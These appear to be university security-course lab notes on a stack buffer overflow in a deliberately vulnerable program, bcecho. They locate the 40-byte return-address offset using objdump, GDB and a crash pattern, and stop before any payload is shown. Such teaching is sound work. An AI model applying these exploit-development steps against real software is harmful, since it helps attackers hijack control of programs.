If you update your VM according to the latest version of this week's instructions, you'll get a copy of bcecho in /src: % cd /src % sudo rm -f Makefile bcvi.c bcecho.c % sudo wget http://www-users.cselabs.umn.edu/classes/Fall-2017/csci5271/ha1/v1.1/{Makefile,bcvi.c,bcecho.c} % sudo make all bcecho % sudo make install % bcvi /dev/null The key code in bcecho.c is the function print_arg, which is called from main: % cat bcecho.c We also have our own implementation of strlcpy(), since it's not part of the standard library. The print_arg function performs an unneeded copy, and the computation of the size is a bit crazy. What does that formula work out to be? If we're going to exploit this, we should figure out where in the attack string to put the value that will overwrite the return address. We'll demo three approaches: * Disassembly To see the binary code of the executable in a somewhat readable form, use: % objdump -dS bcecho | less "-d" says to disassemble, and "-S" says to interleave the source code if it's available. The pager program "less" will let us conveniently navigate in and search in the results. (You could also redirect to a file and then use your favorite text editor.) Search for "print_arg" (using the "/" command in less) to find the relevant code here: 08048520 : void print_arg(char *str) { 8048520: 55 push %ebp 8048521: 89 e5 mov %esp,%ebp 8048523: 83 ec 28 sub $0x28,%esp char buf[20]; int len; int buf_sz = (sizeof(buf) - sizeof(NULL)) * sizeof(char *); 8048526: c7 45 f4 40 00 00 00 movl $0x40,-0xc(%ebp) len = strlcpy(buf, str, buf_sz); 804852d: 8b 45 f4 mov -0xc(%ebp),%eax 8048530: 50 push %eax 8048531: ff 75 08 pushl 0x8(%ebp) 8048534: 8d 45 dc lea -0x24(%ebp),%eax 8048537: 50 push %eax 8048538: e8 5e ff ff ff call 804849b The move on '526 is setting up buf_sz: we see it's 0x40 = 64. Then it pushes the arguments to strlcpy in reverse order. buf_sz is pushed first, followed by str (0x8(%ebp) is the first argument), and finally buf. There's no stack slot holding the location of buf, but the code generates a pointer to it using "lea", so we can see that the start of the array is at an offset of -0x24 from %ebp. The return address is at 0x4(%ebp) (in between the first argument and the saved old %ebp at offset 0), so the distance from the start of the buffer to the location that will overwrite the return address is 0x24+ 4 = 0x28 = 40. * GDB To run an execution of the program under a debugger, use: % gdb --args ./bcecho hello The "--args" option says that all the remaining command-line arguments are arguments to the program, rather than to GDB. (gdb) b print_arg Breakpoint 1 at 0x8048539: file bcecho.c, line 40. (gdb) run Starting program: /src/bcecho Hello Breakpoint 1, print_arg (str=0xffffd8ff "Hello") at bcecho.c:40 40 int buf_sz = (sizeof(buf) - sizeof(NULL)) * sizeof(char *); (gdb) n 41 len = strlcpy(buf, str, buf_sz); (gdb) p buf_sz $1 = 64 (gdb) p &buf $2 = (char (*)[20]) 0xffffd6e4 (gdb) info frame Stack level 0, frame at 0xffffd710: eip = 0x8048540 in print_arg (bcecho.c:41); saved eip = 0x80485d3 called by frame at 0xffffd740 source language c. Arglist at 0xffffd708, args: str=0xffffd8ff "Hello" Locals at 0xffffd708, Previous frame's sp is 0xffffd710 Saved registers: ebp at 0xffffd708, eip at 0xffffd70c The location of the saved return address is what GDB calls the saved EIP. You can also get GDB to do the math for you: (gdb) p 0xffffd70c - (int)&buf $3 = 40 * Experimentation Another way to explore buffer overflows is to supply different data and see what happens. For instance, you can trigger an overflow using a pattern of data that you'll recognize later: % ./bcecho AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN Segmentation fault (core dumped) Without bothering with GDB, some basic information about crashes is recorded by the kernel on this system: % dmesg -T | tail -1 [Tue Sep 19 16:46:25 2017] bcecho[1525]: segfault at 4b4b4b4b ip 000000004b4b4b4b sp 00000000ffffd640 error 14 in libc-2.23.so[f7e13000+1b0000] 0x4b4b4b4b doesn't look like a valid code address. What letter does 0x4b code for in ASCII? % ascii 0x4b ASCII 4/11 is decimal 075, hex 4b, octal 113, bits 01001011: prints as `K' Official name: Majuscule K Other names: Capital K, Uppercase K To make an attack, the "KKKK" in the above string is what we'd replace with the address we want to jump to.